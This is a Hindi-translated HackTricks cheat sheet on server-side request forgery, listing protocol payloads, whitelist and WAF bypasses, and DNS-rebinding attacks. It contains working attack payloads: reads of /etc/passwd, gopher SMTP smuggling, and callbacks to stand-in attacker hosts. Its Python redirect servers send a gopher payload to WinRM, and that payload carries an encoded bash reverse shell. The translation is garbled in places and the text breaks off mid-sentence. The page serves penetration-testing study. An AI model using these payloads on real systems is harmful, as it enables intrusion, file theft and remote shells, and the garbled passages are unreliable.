hacktricks/pentesting-web/ssrf-server-side-request-forgery
2023-12-16 15:25:38 +00:00
..
cloud-ssrf.md Translated to Hindi 2023-11-06 08:38:02 +00:00
README.md Translated to Hindi 2023-11-06 08:38:02 +00:00
ssrf-vulnerable-platforms.md Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi 2023-12-16 15:25:38 +00:00
url-format-bypass.md Translated to Hindi 2023-11-06 08:38:02 +00:00

SSRF (सर्वर साइड रिक्वेस्ट फोर्जरी)


Trickest का उपयोग करें और आसानी से वर्कफ़्लो बनाएं और विश्व के सबसे उन्नत समुदाय उपकरणों द्वारा कार्यों को स्वचालित करें।
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
  • क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने का अधिकार चाहिए? सदस्यता योजनाएं की जांच करें!
  • The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
  • आधिकारिक PEASS & HackTricks swag प्राप्त करें
  • शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter 🐦@carlospolopm** का पालन करें**.
  • अपने हैकिंग ट्रिक्स साझा करें, PRs के माध्यम से hacktricks repo और hacktricks-cloud repo को सबमिट करके.

सर्वर-साइड रिक्वेस्ट फोर्जरी (जिसे SSRF के रूप में भी जाना जाता है) एक वेब सुरक्षा संकट है जो एक हमलावर को अपनी पसंद के अनिश्चित डोमेन पर HTTP अनुरोध बनाने के लिए सर्वर-साइड एप्लिकेशन को प्रेरित करता है। (यहां से)[https://portswigger.net/web-security/ssrf]

SSRF को कैप्चर करें

पहली चीज जो आपको करनी होगी, वह यह है कि आपके द्वारा प्रेरित एक SSRF इंटरेक्शन को कैप्चर करें। HTTP या DNS इंटरेक्शन को कैप्चर करने के लिए आप निम्नलिखित उपकरणों का उपयोग कर सकते हैं:

व्हाइटलिस्टेड डोमेन बाईपास

आमतौर पर आपको पाया जाएगा कि SSRF केवल निश्चित व्हाइटलिस्टेड डोमेन या URL में काम कर रहा है। आपके पास निम्नलिखित पृष्ठ में एक टेक्निक का संकलन है जिसका प्रयास करें व्हाइटलिस्ट को बाईपास करने के लिए:

{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

ओपन रीडायरेक्ट के माध्यम से बाईपास करें

यदि सर्वर सही ढंग से संरक्षित है, तो आप वेब पृष्ठ के अंदर ओपन रीडायरेक्ट का उपयोग करके सभी प्रतिबंधों को बाईपास कर सकते हैं। क्योंकि वेबपेज एक ही डोमेन के लिए SSRF की अनुमति देगा और शायद रीडायरेक्ट का पालन करेगा, आप ओपन रीडायरेक्ट का शोषण करके सर्वर को किसी भी संसाधन तक पहुंचने के लिए उपयोग कर सकते हैं
यहां अधिक जानें: https://portswigger.net/web-security/ssrf

प्रोटोकॉल

file://

file:///etc/passwd

dict://

DICT URL योजना का उपयोग DICT प्रोटोकॉल का उपयोग करके परिभाषाओं या शब्द सूचियों को संदर्भित करने के लिए किया जाता है:

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/

SFTP://

एक सुरक्षित शैल में सुरक्षित फ़ाइल संचार के लिए उपयोग होने वाला नेटवर्क प्रोटोकॉल है।

ssrf.php?url=sftp://evil.com:11111/

TFTP://

त्रिवियल फ़ाइल ट्रांसफ़र प्रोटोकॉल, UDP पर काम करता है।

ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET

LDAP://

लाइटवेट डायरेक्टरी एक्सेस प्रोटोकॉल। यह एक एप्लिकेशन प्रोटोकॉल है जो एक आईपी नेटवर्क पर वितरित डायरेक्टरी सूचना सेवा को प्रबंधित और एक्सेस करने के लिए उपयोग किया जाता है।

ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

Gopher://

इस प्रोटोकॉल का उपयोग करके आप सर्वर को भेजने के लिए IP, पोर्ट और बाइट को निर्दिष्ट कर सकते हैं। फिर, आप मूल रूप से किसी भी TCP सर्वर के साथ एक SSRF का उपयोग करके उपयोग कर सकते हैं (लेकिन आपको पहले सेवा के साथ बात करने का तरीका पता होना चाहिए)।
भाग्यशाली रूप से, आप Gopherus का उपयोग करके कई सेवाओं के लिए payloads बना सकते हैं। इसके अलावा, remote-method-guesser का उपयोग Java RMI सेवाओं के लिए gopher payloads बनाने के लिए किया जा सकता है।

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

गोफर एचटीटीपी

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

गोफर SMTP - 1337 को बैक कनेक्ट करें

{% code title="redirect.php" %}

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

{% endcode %}

SMTP

https://twitter.com/har1sec/status/1182255952055164929 से:
1. smtp localhost:25 पर SSRF के साथ कनेक्ट करें
2. पहली पंक्ति से आंतरिक डोमेन नाम प्राप्त करें 220 http://blabla.internaldomain.com ESMTP Sendmail
3. github पर खोजें http://internaldomain.com , सबडोमेन्स प्राप्त करें
4. कनेक्ट करें

Curl URL globbing - WAF bypass

यदि SSRF curl द्वारा निष्पादित किया जाता है, तो curl में URL globbing नामक एक विशेषता होती है जो WAFs को बाइपास करने के लिए उपयोगी हो सकती है। उदाहरण के लिए इस writeup में आप file प्रोटोकॉल के माध्यम से पाथ ट्रावर्सल के लिए इस उदाहरण को खोज सकते हैं:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

SSRF अनुरोधों को कैप्चर करें

Referrer हेडर के माध्यम से SSRF

कुछ ऐप्लिकेशन सर्वर-साइड विश्लेषण सॉफ़्टवेयर का उपयोग करते हैं जो आगंतुकों का पता लगाता है। यह सॉफ़्टवेयर आमतौर पर अनुरोधों में रेफ़रर हेडर को लॉग करता है, क्योंकि यह आगंतुकों से आने वाले लिंक को ट्रैक करने के लिए विशेष रुचि का विषय होता है। अक्सर विश्लेषण सॉफ़्टवेयर वास्तव में रेफ़रर हेडर में दिखने वाले किसी तृतीय-पक्ष URL को भी विज़िट करेगा। यह आमतौर पर उपयोग किया जाता है ताकि आने वाले लिंक में उपयोग किए जाने वाले एंकर पाठ सहित रेफ़रर साइट की सामग्री का विश्लेषण किया जा सके। इस परिणामस्वरूप, रेफ़रर हेडर अक्सर SSRF संरचना के लिए उपयोगी होता है।
इस तरह के "छिपे हुए" संरचनाओं का पता लगाने के लिए आप बर्प के प्लगइन "Collaborator Everywhere" का उपयोग कर सकते हैं।

प्रमाणपत्र से SNI डेटा के माध्यम से SSRF

एक ऐसी सरल गलतिफहमी जो आपको किसी भी बैकएंड से संपर्क करने की अनुमति देगी, ऐसा कुछ दिखेगा:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

यहां, SNI फ़ील्ड का मान सीधे बैकएंड का पता के रूप में उपयोग किया जाता है।

इस असुरक्षित कॉन्फ़िगरेशन के साथ, हम SSRF दुरुपयोग को सरलता से उपयोग कर सकते हैं, सीधे SNI फ़ील्ड में इच्छित IP या डोमेन नाम को निर्दिष्ट करके। उदाहरण के लिए, निम्नलिखित कमांड Nginx को internal.host.com से कनेक्ट करने के लिए मजबूर करेगी:

openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf

Wget फ़ाइल अपलोड

कमांड इंजेक्शन के साथ SSRF

ऐसा प्रयास करने में लायक हो सकता है: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF रेंडरिंग

यदि वेब पेज स्वचालित रूप से एक PDF बना रहा है जिसमें आपने कुछ जानकारी प्रदान की है, तो आप कुछ JS डाल सकते हैं जो PDF निर्माता खुद (सर्वर) द्वारा प्रयोज्य होगा जबकि PDF बनाते समय और आप SSRF का दुरुपयोग कर सकेंगे। अधिक जानकारी यहां देखें.

SSRF से DoS तक

एकाधिक सत्र बनाएं और सत्रों से SSRF का दुरुपयोग करके भारी फ़ाइलें डाउनलोड करने का प्रयास करें।

SSRF PHP फ़ंक्शन

{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}

SSRF गोफर को रीडायरेक्ट करें

कुछ उत्पादनों के लिए आपको रीडायरेक्ट प्रतिक्रिया भेजनी हो सकती है (संभवतः गोफर जैसे एक अलग प्रोटोकॉल का उपयोग करने के लिए)। यहां आपको रीडायरेक्ट के साथ प्रतिक्रिया देने के लिए विभिन्न पायथन कोड हैं:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)

self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

यहां आप एसएसएल प्रोटोकॉल का उपयोग करके सर्वर को सुरक्षित करने के लिए सर्वर प्रमाणपत्र (server.pem) का उपयोग कर रहे हैं। यह सर्वर निरंतर सेवा प्रदान करेगा और MainHandler को उपयोग करके आगंतुकों के अनुरोधों का प्रतिसाद देगा।

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)


Trickest का उपयोग करें और आसानी से वर्कफ़्लो बनाएं और स्वचालित करें, जो दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित होते हैं।
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

DNS Rebidding CORS/SOP बाईपास

यदि आपको CORS/SOP के कारण स्थानीय IP से सामग्री निकालने में समस्या हो रही है, तो DNS Rebidding का उपयोग इस प्रतिबंध को दूर करने के लिए किया जा सकता है:

{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}

स्वचालित DNS Rebidding

Singularity of Origin एक टूल है जो DNS rebinding हमलों को करने के लिए उपयोग होता है। इसमें आवश्यक घटक शामिल हैं जो हमले करने वाले सर्वर DNS नाम के IP पते को लक्ष्य मशीन के IP पते से बाइंड करने और लक्ष्य मशीन पर संक्रमित सॉफ़्टवेयर का शोधन करने के लिए हमले के भोजन को सेवा करने के लिए आवश्यक होते हैं।

इसके अलावा, देखें सार्वजनिक रूप से चल रहे सर्वर को http://rebind.it/singularity.html में

DNS Rebidding + TLS सत्र ID/सत्र टिकट

आवश्यकताएं:

  • SSRF
  • आउटबाउंड TLS सत्र
  • स्थानीय पोर्ट पर सामग्री

हमला:

  1. उपयोगकर्ता/बॉट से कहें कि वह हमलावर द्वारा नियंत्रित डोमेन तक पहुंचें
  2. DNS का TTL 0 सेकंड है (इसलिए पीड़ित जल्दी ही डोमेन के IP की जांच करेगा)
  3. पीड़ित और हमलावर द्वारा बनाए गए डोमेन के बीच एक TLS कनेक्शन बनाया जाता है। हमलावर आपत्तिजनक सॉफ़्टवेयर को शोषित करने के लिए सत्र ID या सत्र टिकट में भोजन को प्रस्तुत करता है।
  4. डोमेन अपने आप को असीमित पुनर्निर्देशन के खिलाफ पुनर्निर्देशित करेगा। इसका उद्देश्य यह है कि उपयोगकर्ता/बॉट डोमेन तक पहुंचें जब तक वह डोमेन के लिए फिर से एक DNS अनुरोध करता है।
  5. DNS अनुरोध में एक निजी IP पता अब दिया जाता है (उदाहरण के लिए 127.0.0.1)
  6. उपयोगकर्ता/बॉट TLS कनेक्शन को पुनर्स्थापित करने की कोशिश करेगा और इसके लिए वह सत्र ID/टिकट ID (जहां हमलावर का भोजन था) भेजेगा। तो बधाई हो, आपने सफलतापूर्वक पूछ लिया है कि उपयोगकर्ता/बॉट खुद को हमला करें

ध्यान दें कि इस हमले के दौरान, यदि आप localhost:11211 (मेमकैश) पर हमला करना चाहते हैं, तो आपको पीड़ित को www.attacker.com:11211 के साथ प्राथमिक कनेक्शन स्थापित करने की आवश्यकता होगी (पोर्ट हमेशा समान होना चाहिए)।
इस हमले को करने के लिए आप इस टूल का उपयोग कर सकते हैं: https://github.com/jmdx/TLS-poison/
अधिक जानकारी के लिए इस हमले को समझाने वाले टॉक पर नज़र डालें: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

अंधा SSRF

अंधा SSRF और अंधा नहीं SSRF के बीच अंतर यह है कि अंधे में आप SSRF अनुरोध के प्रतिक्रिया को नहीं देख सकते हैं। फिर, इसे उत्पन्न करना कठिन हो जाता है क्योंकि आ


Trickest का उपयोग करें और आसानी से वर्ल्ड के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित ऑटोमेटेड वर्कफ़्लो बनाएं।
आज ही पहुंच प्राप्त करें:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}